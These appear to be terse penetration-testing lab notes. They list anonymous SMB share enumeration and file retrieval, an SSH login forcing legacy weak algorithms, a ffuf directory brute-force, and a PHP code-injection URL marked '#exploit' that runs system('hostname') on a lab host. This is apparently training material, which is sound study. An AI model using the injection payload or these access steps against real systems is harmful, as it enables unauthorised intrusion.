smbclient -L //192.168.107.133 -N 
smbclient //192.168.107.133/reports -N
ls
get staff.txt
get notes.txt
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc pete@192.168.107.133


Lab 4
Directory BruteForce
sudo apt update && sudo apt install ffuf -y

ffuf -u http://<CHANGE TO YOUR IP>/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php,.html,.txt -mc 200,204,301,302

#exploit
http://192.168.107.134/index.php?page=index%27);echo%20system(%27hostname%27);//
